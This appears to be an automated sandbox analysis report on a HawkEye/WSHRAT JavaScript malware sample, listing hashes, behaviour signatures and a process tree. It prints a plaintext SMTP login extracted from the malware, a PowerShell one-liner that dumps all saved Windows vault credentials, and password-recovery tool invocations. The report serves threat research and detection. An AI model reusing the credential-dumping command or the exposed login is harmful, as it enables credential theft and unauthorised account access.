Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    29/09/2021, 04:13

General

  • Target

    Scano005110.js

  • Size

    5.2MB

  • MD5

    a3a411523aa5bf3818e8925e908be9a2

  • SHA1

    e356ce5f29c820c5fc7ca65c242be082bafc8fe8

  • SHA256

    052a6543d8392cf4c54e7f88f80b41f571ea4e937e3caa6fa9b42a860b40b30c

  • SHA512

    edd2647484ef73879e4c48f8e89f6166bdc73725b17b8a95d3522fbac9954749b93ddc9043a4c0db2e58de382b5a97a7d96ec3ebe7cd36ee7fd7ae6d78f42e88

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.legacypharma.com.pk
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    aurangzeb1926

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • NirSoft MailPassView 10 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 7 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 13 IoCs
  • Blocklisted process makes network request 31 IoCs
  • Executes dropped EXE 4 IoCs
  • Drops startup file 2 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 4 IoCs
  • Script User-Agent 29 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Users\Admin\AppData\Local\Temp\fthost.exe
      "C:\Users\Admin\AppData\Local\Temp\fthost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Users\Admin\AppData\Roaming\Windows Update.exe
        "C:\Users\Admin\AppData\Roaming\Windows Update.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
          4⤵
            PID:1972
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:600
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3952
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM cmdc.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1300
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2528
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM cmdc.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2976
      • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
        "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
        2⤵
        • Executes dropped EXE
        PID:652
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
        2⤵
          PID:3956
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1528
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM cmdc.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3496
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM cmdc.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:980
        • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
          "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
          2⤵
          • Executes dropped EXE
          PID:1804

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/600-131-0x0000000000400000-0x0000000000458000-memory.dmp

        Filesize

        352KB

      • memory/600-129-0x0000000000400000-0x0000000000458000-memory.dmp

        Filesize

        352KB

      • memory/1972-124-0x0000000000400000-0x000000000041B000-memory.dmp

        Filesize

        108KB

      • memory/1972-128-0x0000000000400000-0x000000000041B000-memory.dmp

        Filesize

        108KB

      • memory/2004-127-0x0000000002D44000-0x0000000002D46000-memory.dmp

        Filesize

        8KB

      • memory/2004-122-0x0000000002D40000-0x0000000002D41000-memory.dmp

        Filesize

        4KB

      • memory/2004-126-0x0000000002D41000-0x0000000002D42000-memory.dmp

        Filesize

        4KB

      • memory/2768-118-0x0000000000900000-0x0000000000901000-memory.dmp

        Filesize

        4KB

      • memory/3952-152-0x0000022142EE6000-0x0000022142EE8000-memory.dmp

        Filesize

        8KB

      • memory/3952-151-0x000002215B3E0000-0x000002215B3E1000-memory.dmp

        Filesize

        4KB

      • memory/3952-144-0x000002215B2F0000-0x000002215B2F1000-memory.dmp

        Filesize

        4KB

      • memory/3952-143-0x000002215B360000-0x000002215B361000-memory.dmp

        Filesize

        4KB

      • memory/3952-140-0x000002215B1B0000-0x000002215B1B1000-memory.dmp

        Filesize

        4KB

      • memory/3952-139-0x0000022142EE3000-0x0000022142EE5000-memory.dmp

        Filesize

        8KB

      • memory/3952-138-0x0000022142EE0000-0x0000022142EE2000-memory.dmp

        Filesize

        8KB